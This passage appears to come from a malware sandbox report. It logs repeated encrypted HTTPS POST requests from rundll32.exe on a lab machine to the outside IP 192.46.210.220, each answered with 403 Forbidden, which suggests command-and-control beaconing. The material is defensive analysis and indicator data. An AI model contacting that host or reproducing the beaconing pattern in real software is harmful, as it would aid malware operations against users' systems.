                                                                                                      2021-10-28 02:55:28 UTC169OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:29 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.749893192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:28 UTC174OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:28 UTC174OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:29 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.749900192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:32 UTC179OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:32 UTC179OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:32 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.749901192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:32 UTC184OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:32 UTC184OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:33 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.749908192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:36 UTC189OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:36 UTC189OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:36 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.749909192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:36 UTC194OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:36 UTC194OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:37 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.749739192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:26 UTC19OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:26 UTC20OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:27 UTC24INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.749917192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:40 UTC199OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:40 UTC199OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:40 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.749918192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:40 UTC204OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:40 UTC204OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:40 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.749925192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:43 UTC209OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:43 UTC209OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:44 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.749926192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:44 UTC214OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:44 UTC214OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:45 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.749932192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:48 UTC219OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:48 UTC219OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:49 UTC224INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.749934192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:49 UTC224OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:49 UTC224OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:50 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.749940192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:52 UTC229OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
